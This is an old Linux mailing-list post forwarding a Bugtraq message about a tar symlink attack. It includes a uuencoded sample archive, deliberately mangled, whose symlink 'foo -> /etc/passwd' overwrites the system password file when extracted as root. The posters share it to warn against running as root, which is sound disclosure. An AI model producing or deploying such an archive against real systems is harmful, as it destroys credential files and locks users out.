I mangled the attached file, remove the 3 ### characters from each line
before uudecoding it.
If you unpack the included bad.tar.gz it overwrites /etc/passwd.
A tar ztvf of it reads:
tar ztvf bad.tar.gz
lrwxrwxrwx davids/davids 0 1999-10-26 20:46:50 foo -> /etc/passwd
-rw-r--r-- davids/davids 27 1999-10-26 20:47:46 foo
If this doesn't convince people not to use their system as root..
Donncha
-------- Original Message --------
From: "David F. Skoll" <dfs at DOE.CARLETON.CA>
Subject: Re: Linux kernel source problem
To: BUGTRAQ at SECURITYFOCUS.COM
> If you want to damage your own system, untar the appended sample tar
> file as root (fortunately, GNU tar strips the leading "/" by default).
However, a little creative binary editing can spoof even GNU tar and
destroy
your system, to wit:
begin 644 bad.tar.gz
###M'XL(")\%%C@"`V)A9"YT87(`[=%-#L(@$$!AUCW%W(`IA9+T-M7:V(T8J7I]
###M?V/B0EVUT?B^!9,`"\+K4S)3*YW&&,6(2*S#T[S3\XYJ\.I\<"*E"[4:<78U
###M+NVVS?G83?:X?1[;G8CIVL/0Y=?W/IW_J'Z._JJU]V_Z5]6C?_"7_AK*:$3G
###M^(`_[[]+:6P:;:[3WM;%L+%Y71@`````````````````WZTX`;CJ>H@!*```
###`
end
Please DO NOT unpack the above tar file as root! Just look at
the contents with the "t" option.
--
David.
Maintained by the ILUG website team. The aim of Linux.ie is to
support and help commercial and private users of Linux in Ireland. You can
display ILUG news in your own webpages, read backend
information to find out how. Networking services kindly provided by HEAnet, server kindly donated by
Dell. Linux is a trademark of Linus Torvalds,
used with permission. No penguins were harmed in the production or maintenance
of this highly praised website. Looking for the
Indian Linux Users' Group? Try here. If you've read all this and aren't a lawyer: you should be!
